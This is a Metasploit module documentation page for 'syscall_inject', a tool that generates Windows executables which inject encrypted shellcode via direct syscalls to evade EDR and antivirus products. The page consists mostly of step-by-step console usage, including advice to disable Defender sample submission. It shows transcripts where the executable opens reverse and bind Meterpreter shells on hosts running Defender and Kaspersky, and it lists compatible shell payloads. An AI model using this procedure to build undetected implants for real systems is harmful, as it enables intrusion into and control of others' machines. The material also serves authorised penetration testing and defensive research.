Direct windows syscall evasion technique - Metasploit


This page contains detailed information about how to use the evasion/windows/syscall_inject metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Direct windows syscall evasion technique
Module: evasion/windows/syscall_inject
Source code: modules/evasion/windows/syscall_inject.rb
Disclosure date: -
Last modification time: 2021-09-22 09:55:17 +0000
Supported architecture(s): x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module allows you to generate a Windows EXE that evades Host-based security products such as EDR/AVs. It uses direct windows syscalls to achieve stealthiness, and avoid EDR hooking. please try to use payloads that use a more secure transfer channel such as HTTPS or RC4 in order to avoid payload's network traffic getting caught by network defense mechanisms. NOTE: for better evasion ratio, use high SLEEP values

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use evasion/windows/syscall_inject
msf evasion(syscall_inject) > show options
    ... show and set options ...
msf evasion(syscall_inject) > exploit

Knowledge Base

Description

This module lets you create a Windows executable that injects a specific payload/shellcode in memory bypassing EDR/AVs Windows API hooking technique via direct syscalls achieved by Mingw's inline assembly. Mingw needs (x86_64) to be installed on the system and in the PATH enviroment variable.

The technique used is based on Sorting by System Call Address, by enumerating all Zw* stubs in the EAT of NTDLL.dll and then sorting them by address, it still works even if syscall indices were overwritten by AVs. For more details

Verification Steps

steps using a meterpreter/reverse_tcp payload on a 64-bits target:

  1. use evasion/windows/syscall_inject
  2. set LHOST <local IP>
  3. set payload windows/x64/meterpreter/reverse_tcp
  4. handler -p windows/x64/meterpreter/reverse_tcp -H <local IP> -P <local port>
  5. run
  6. Make sure that "Automatic Sample Submission" is off in Windows Defender
  7. Copy the generated executable file to a specified location (e.g. target PC)
  8. Run it
  9. Verify that you got a session without being blocked by Antimalware

Options

CIPHER

Encryption algorithm used to encrypt the payload. Available ones (CHACHA, RC4)

FILENAME

Filename for the generated evasive file file. The default is random.

JUNK

Adding random data such as names, emails and GUIDs to the final executable

SLEEP

Specify how much the program sleeps in milliseconds prior to execute the shellcode's thread (NtCreateThread). NOTE: the longer the better chance to avoid being detected.

Advanced

OptLevel

Optimization level passed to the compiler (Mingw)

Scenarios

Windows 10 (x64) version 20H2 with Defender

msf6 > use evasion/windows/syscall_inject 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 evasion(windows/syscall_inject) > set SLEEP 10000
SLEEP => 10000
msf6 evasion(windows/syscall_inject) > set LHOST 192.168.1.104
LHOST => 192.168.1.104
msf6 evasion(windows/syscall_inject) > run

[+] pYlCSOAeW.exe stored at /Users/user/.msf4/local/pYlCSOAeW.exe
msf6 evasion(windows/syscall_inject) > cp  /Users/user/.msf4/local/pYlCSOAeW.exe ~
[*] exec: cp  /Users/user/.msf4/local/pYlCSOAeW.exe ~

msf6 evasion(windows/syscall_inject) > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.104 -P 4444
[*] Payload handler running as background job 1.

[*] Started reverse TCP handler on 192.168.1.104:4444 
msf6 evasion(windows/syscall_inject) > [*] Sending stage (200262 bytes) to 192.168.1.103
[*] Meterpreter session 3 opened (192.168.1.104:4444 -> 192.168.1.103:53007) at 2021-08-01 17:08:43 +0300

msf6 evasion(windows/syscall_inject) > sessions -i 3 
[*] Starting interaction with 3...

meterpreter > sysinfo 
Computer        : DESKTOP-822593D
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.103 - Meterpreter session 3 closed.  Reason: User exit

Windows server 2012 (x64) with Kaspersky 10.2.6.3733

msf6 > use evasion/windows/syscall_inject
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 evasion(windows/syscall_inject) > set payload windows/x64/meterpreter_bind_tcp 
payload => windows/x64/meterpreter_bind_tcp
msf6 evasion(windows/syscall_inject) > set RHOST 192.168.225.76
RHOST => 192.168.225.76
msf6 evasion(windows/syscall_inject) > set LPORT 10156
LPORT => 10156
msf6 evasion(windows/syscall_inject) > set cipher rc4
cipher => rc4
msf6 evasion(windows/syscall_inject) > run

[+] ShP.exe stored at /Users/medicus/.msf4/local/ShP.exe
msf6 evasion(windows/syscall_inject) > cp /Users/medicus/.msf4/local/ShP.exe ~
[*] exec: cp /Users/medicus/.msf4/local/ShP.exe ~

msf6 evasion(windows/syscall_inject) > handler -p windows/x64/meterpreter_bind_tcp -H 192.168.225.76 -P 10156
[*] Payload handler running as background job 0.

[*] Started bind TCP handler against 192.168.225.76:10156
msf6 evasion(windows/syscall_inject) > [*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.225.76:10156) at 2021-08-01 17:32:05 +0300

msf6 evasion(windows/syscall_inject) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : LABCE28
OS              : Windows 2012 (6.2 Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 386
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.225.76 - Meterpreter session 1 closed.  Reason: User exit

Go back to menu.

Msfconsole Usage

Here is how the windows/syscall_inject evasion module looks in the msfconsole:

msf6 > use evasion/windows/syscall_inject

[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 evasion(windows/syscall_inject) > show info

       Name: Direct windows syscall evasion technique
     Module: evasion/windows/syscall_inject
   Platform: Windows
       Arch: x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Yaz (kensh1ro)

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  CIPHER    chacha           yes       Shellcode encryption type (Accepted: chacha, rc4)
  FILENAME  sSgPqNG.exe      yes       Filename for the evasive file (default: random)
  SLEEP     20000            no        Sleep time in milliseconds before executing shellcode

Description:
  This module allows you to generate a Windows EXE that evades 
  Host-based security products such as EDR/AVs. It uses direct windows 
  syscalls to achieve stealthiness, and avoid EDR hooking. please try 
  to use payloads that use a more secure transfer channel such as 
  HTTPS or RC4 in order to avoid payload's network traffic getting 
  caught by network defense mechanisms. NOTE: for better evasion 
  ratio, use high SLEEP values

Module Options

This is a complete list of options available in the windows/syscall_inject evasion module:

msf6 evasion(windows/syscall_inject) > show options

Module options (evasion/windows/syscall_inject):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CIPHER    chacha           yes       Shellcode encryption type (Accepted: chacha, rc4)
   FILENAME  sSgPqNG.exe      yes       Filename for the evasive file (default: random)
   SLEEP     20000            no        Sleep time in milliseconds before executing shellcode

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Evasion target:

   Id  Name
   --  ----
   0   Microsoft Windows (x64)

Advanced Options

Here is a complete list of advanced options supported by the windows/syscall_inject evasion module:

msf6 evasion(windows/syscall_inject) > show advanced

Module advanced options (evasion/windows/syscall_inject):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   OptLevel   Os               no        The optimization level to compile with (Accepted: Os, O0, O1, O2, O3, Og)
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Evasion Targets

Here is a list of targets (platforms and systems) supported by the windows/syscall_inject evasion module:

msf6 evasion(windows/syscall_inject) > show targets

Evasion targets:

   Id  Name
   --  ----
   0   Microsoft Windows (x64)

Compatible Payloads

This is a list of possible payloads which are compatible with the windows/syscall_inject evasion module:

msf6 evasion(windows/syscall_inject) > show payloads

Compatible Payloads
===================

   #   Name                                                Disclosure Date  Rank    Check  Description
   -   ----                                                ---------------  ----    -----  -----------
   0   payload/generic/custom                                               normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                       normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                                    normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/windows/x64/exec                                             normal  No     Windows x64 Execute Command
   4   payload/windows/x64/loadlibrary                                      normal  No     Windows x64 LoadLibrary Path
   5   payload/windows/x64/messagebox                                       normal  No     Windows MessageBox x64
   6   payload/windows/x64/meterpreter/bind_ipv6_tcp                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   7   payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   8   payload/windows/x64/meterpreter/bind_named_pipe                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   9   payload/windows/x64/meterpreter/bind_tcp                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   10  payload/windows/x64/meterpreter/bind_tcp_rc4                         normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   11  payload/windows/x64/meterpreter/bind_tcp_uuid                        normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   12  payload/windows/x64/meterpreter/reverse_http                         normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   13  payload/windows/x64/meterpreter/reverse_https                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   14  payload/windows/x64/meterpreter/reverse_named_pipe                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   15  payload/windows/x64/meterpreter/reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   16  payload/windows/x64/meterpreter/reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   17  payload/windows/x64/meterpreter/reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   18  payload/windows/x64/meterpreter/reverse_winhttp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   19  payload/windows/x64/meterpreter/reverse_winhttps                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
   20  payload/windows/x64/meterpreter_bind_named_pipe                      normal  No     Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
   21  payload/windows/x64/meterpreter_bind_tcp                             normal  No     Windows Meterpreter Shell, Bind TCP Inline (x64)
   22  payload/windows/x64/meterpreter_reverse_http                         normal  No     Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   23  payload/windows/x64/meterpreter_reverse_https                        normal  No     Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   24  payload/windows/x64/meterpreter_reverse_ipv6_tcp                     normal  No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   25  payload/windows/x64/meterpreter_reverse_tcp                          normal  No     Windows Meterpreter Shell, Reverse TCP Inline x64
   26  payload/windows/x64/peinject/bind_ipv6_tcp                           normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
   27  payload/windows/x64/peinject/bind_ipv6_tcp_uuid                      normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
   28  payload/windows/x64/peinject/bind_named_pipe                         normal  No     Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
   29  payload/windows/x64/peinject/bind_tcp                                normal  No     Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
   30  payload/windows/x64/peinject/bind_tcp_rc4                            normal  No     Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   31  payload/windows/x64/peinject/bind_tcp_uuid                           normal  No     Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
   32  payload/windows/x64/peinject/reverse_named_pipe                      normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
   33  payload/windows/x64/peinject/reverse_tcp                             normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
   34  payload/windows/x64/peinject/reverse_tcp_rc4                         normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   35  payload/windows/x64/peinject/reverse_tcp_uuid                        normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
   36  payload/windows/x64/pingback_reverse_tcp                             normal  No     Windows x64 Pingback, Reverse TCP Inline
   37  payload/windows/x64/powershell_bind_tcp                              normal  No     Windows Interactive Powershell Session, Bind TCP
   38  payload/windows/x64/powershell_reverse_tcp                           normal  No     Windows Interactive Powershell Session, Reverse TCP
   39  payload/windows/x64/shell/bind_ipv6_tcp                              normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
   40  payload/windows/x64/shell/bind_ipv6_tcp_uuid                         normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
   41  payload/windows/x64/shell/bind_named_pipe                            normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
   42  payload/windows/x64/shell/bind_tcp                                   normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager
   43  payload/windows/x64/shell/bind_tcp_rc4                               normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   44  payload/windows/x64/shell/bind_tcp_uuid                              normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
   45  payload/windows/x64/shell/reverse_tcp                                normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager
   46  payload/windows/x64/shell/reverse_tcp_rc4                            normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   47  payload/windows/x64/shell/reverse_tcp_uuid                           normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
   48  payload/windows/x64/shell_bind_tcp                                   normal  No     Windows x64 Command Shell, Bind TCP Inline
   49  payload/windows/x64/shell_reverse_tcp                                normal  No     Windows x64 Command Shell, Reverse TCP Inline
   50  payload/windows/x64/vncinject/bind_ipv6_tcp                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   51  payload/windows/x64/vncinject/bind_ipv6_tcp_uuid                     normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   52  payload/windows/x64/vncinject/bind_named_pipe                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
   53  payload/windows/x64/vncinject/bind_tcp                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   54  payload/windows/x64/vncinject/bind_tcp_rc4                           normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   55  payload/windows/x64/vncinject/bind_tcp_uuid                          normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   56  payload/windows/x64/vncinject/reverse_http                           normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   57  payload/windows/x64/vncinject/reverse_https                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   58  payload/windows/x64/vncinject/reverse_tcp                            normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   59  payload/windows/x64/vncinject/reverse_tcp_rc4                        normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   60  payload/windows/x64/vncinject/reverse_tcp_uuid                       normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   61  payload/windows/x64/vncinject/reverse_winhttp                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   62  payload/windows/x64/vncinject/reverse_winhttps                       normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Compilation error. Check the logs for further information.

Here is a relevant code snippet related to the "Compilation error. Check the logs for further information." error message:

538:	  def generate_code(src, opts = {})
539:	    comp_obj = Metasploit::Framework::Compiler::Mingw::X64.new(opts)
540:	    compiler_out = comp_obj.compile_c(src)
541:	    unless compiler_out.empty?
542:	      elog(compiler_out)
543:	      raise Metasploit::Framework::Compiler::Mingw::UncompilablePayloadError, 'Compilation error. Check the logs for further information.'
544:	    end
545:	    comp_file = "#{opts[:f_name]}.exe"
546:	    raise Metasploit::Framework::Compiler::Mingw::CompiledPayloadNotFoundError unless File.exist?(comp_file)
547:	
548:	    bin = File.binread(comp_file)

Go back to menu.

Go back to menu.

See Also

Check also the following modules related to this module:

Authors

  • Yaz (kensh1ro)

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.